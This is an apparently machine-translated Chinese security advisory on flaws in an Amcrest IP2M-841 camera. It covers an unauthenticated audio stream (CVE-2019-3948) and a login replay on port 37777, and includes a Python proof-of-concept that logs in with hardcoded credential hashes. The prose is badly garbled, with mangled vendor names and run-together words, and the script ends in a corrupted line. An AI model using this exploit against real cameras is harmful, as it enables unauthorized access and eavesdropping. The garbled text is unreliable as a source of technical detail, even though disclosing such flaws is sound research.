最敏捷IP相机多重易变性

可租用时间检查安卓IP2M-841IP相机发现下方

CVE-2019-3948:HTTP非认证远程音频流

相机揭穿HTTP端点视频聊天.端点允许远程用户监听摄像头当前摄取的音频端点不执行任何形式的认证远程非认证攻击者可解码DHAV格式

查看链接证明概念完全实现相机使用默认设置时,概念输出证明应可用ffplay播放,命令如下:

ffplay-falaw-ar8k-ac1

登录重放

IP2M-841B像大多数大华设备一样,在TCP端口37777有监听服务前一位研究者发现远程攻击者使用抓取hash登陆接口CVE2017-7927)大花当时似乎修复可租发现Amerest IP2M-841B仍然易受攻击,如果用户密码只有8个字符长下脚本使用admin和01testithashes登录并认证软件版本请求

import argparse import socket import struct import sys  top_parser = argparse.ArgumentParser(description='Login using admin:01testit and get the software version') top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to") top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777") args = top_parser.parse_args()  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Attempting connection to " + args.ip + ":" + str(args.port) sock.connect((args.ip, args.port)) print "[+] Connected!"  login = ("\xa0\x00\x00\x60\x00\x00\x00\x00" +           "\xc4\xa3\xaf\x48\x99\x56\xb6\xb4" + # username hash          "\x7e\x48\xc4\x86\x90\x98\x54\xf3" + # password hash          "\x05\x02\x00\x01\x00\x00\xa1\xaa") sock.sendall(login) resp = sock.recv(1024)  if len(resp) != 32:     print 'What is this?'     sys.exit(0)  session_id_bin = resp[16:20]  session_id_int = struct.unpack_from('I', session_id_bin) if session_id_int[0] == 0:  print "Failed to log in.sessions.id_int#0xmt